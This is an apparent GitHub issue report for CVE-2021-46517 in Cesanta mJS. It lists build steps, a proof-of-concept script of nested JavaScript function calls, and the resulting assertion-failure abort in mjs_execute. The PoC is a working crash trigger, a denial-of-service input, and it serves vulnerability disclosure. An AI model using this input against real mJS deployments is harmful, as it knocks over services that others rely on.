Headline

CVE-2021-46517: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed src/mjs_exec.c:725: mjs_execute. · Issue #184 · cesanta/mjs

There is an Assertion `mjs_stack_size(&mjs->scopes) > 0’ failed at src/mjs_exec.c in Cesanta MJS v2.20.0.

2 years ago

CVE

Open in Source

#ubuntu #linux #js

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

(function() {
  ((function JSEtest(a) {
    if (a > 3) {
      if ([((function JSEtest(a) {
    if (a > 3) {
      if ([Object.create.apply({}, [Object])]) {
      Object.create.apply({}, [Object])
    }
    }
  })(6))([((function JSEtest(a) {
    if (a > 3) {
      if ([Object.create.apply({}, [Object])]) {
      Object.create.apply({}, [Object])
    }
    }
  })(6))({}, [Object])])]) {
      Object.create.apply({}, [Object])
    }
    }
  })(6))
})()

Execution steps & Output

$ ./mjs/build/mjs poc.js

mjs: src/mjs_exec.c:725: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) > 0’ failed. [1] 111718 abort mjs poc.js